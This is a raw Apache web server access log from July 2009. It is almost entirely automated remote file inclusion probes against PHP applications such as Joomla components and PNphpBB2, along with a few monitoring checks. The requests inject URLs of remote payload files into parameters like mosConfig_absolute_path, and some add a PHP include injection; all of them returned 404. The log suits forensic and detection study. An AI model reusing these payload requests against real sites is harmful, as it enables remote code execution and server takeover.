211.115.213.35 - - [06/Jul/2009:04:40:33 -0400] "GET /logs/access_log.Q109052500%20%20//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:04:40:48 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:04:40:48 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:04:40:48 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:04:40:48 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:41:06 -0400] "GET /logs/access_log.Q109062300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.109.245.179 - - [06/Jul/2009:04:41:21 -0400] "GET /logs/error_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:04:41:26 -0400] "GET /logs/error_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
213.92.85.176 - - [06/Jul/2009:04:41:36 -0400] "GET /logs/access_log.Q109062300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:04:42:15 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:43:09 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:43:10 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:43:10 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:04:43:13 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:04:43:21 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:04:43:40 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:04:43:45 -0400] "GET /logs/error_log.Q109053100//modules/errors.php?error=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:43:50 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:43:50 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:43:51 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:44:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.171.190.110 - - [06/Jul/2009:04:45:09 -0400] "GET /logs/access_log.Q109062300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.200.199.144 - - [06/Jul/2009:04:45:38 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://great21.co.kr////data/_private/cvs/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.200.199.144 - - [06/Jul/2009:04:45:39 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://great21.co.kr////data/_private/cvs/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
114.200.199.144 - - [06/Jul/2009:04:45:39 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://great21.co.kr////data/_private/cvs/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.200.199.144 - - [06/Jul/2009:04:45:47 -0400] "GET /logs/access_log.Q109061900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://great21.co.kr////data/_private/cvs/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:04 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:05 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:05 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:06 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:06 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:06 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:07 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:07 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:07 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:25 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:25 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:47:26 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:48:12 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:48:14 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:48:15 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:48:18 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:48:18 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:48:19 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:04:48:48 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:04:48:48 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:49:01 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:49:01 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:49:01 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:49:02 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:49:02 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:49:02 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:49:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.207.17.120 - - [06/Jul/2009:04:49:13 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:49:14 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:49:23 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:49:33 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jul/2009:04:50:55 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
195.34.78.110 - - [06/Jul/2009:04:50:58 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:00 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:02 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:18 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:56 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:56 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:56 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:57 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:58 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:58 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:51:59 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:52:06 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:52:06 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:52:07 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:52:10 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:52:10 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:52:10 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:52:53 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:54:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.230.156.161 - - [06/Jul/2009:04:55:15 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:55:15 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:55:15 -0400] "GET /logs/access_log.Q109060600%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:55:30 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:55:35 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:55:41 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:55:42 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:55:42 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.237.66.229 - - [06/Jul/2009:04:55:44 -0400] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
218.237.66.229 - - [06/Jul/2009:04:55:44 -0400] "GET /logs/access_log.Q109051000/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.237.66.229 - - [06/Jul/2009:04:55:44 -0400] "GET /modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:55:44 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:55:57 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:56:02 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:56:06 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.207.17.120 - - [06/Jul/2009:04:56:07 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:56:11 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:56:16 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jul/2009:04:56:36 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
195.34.78.110 - - [06/Jul/2009:04:56:40 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:57:28 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
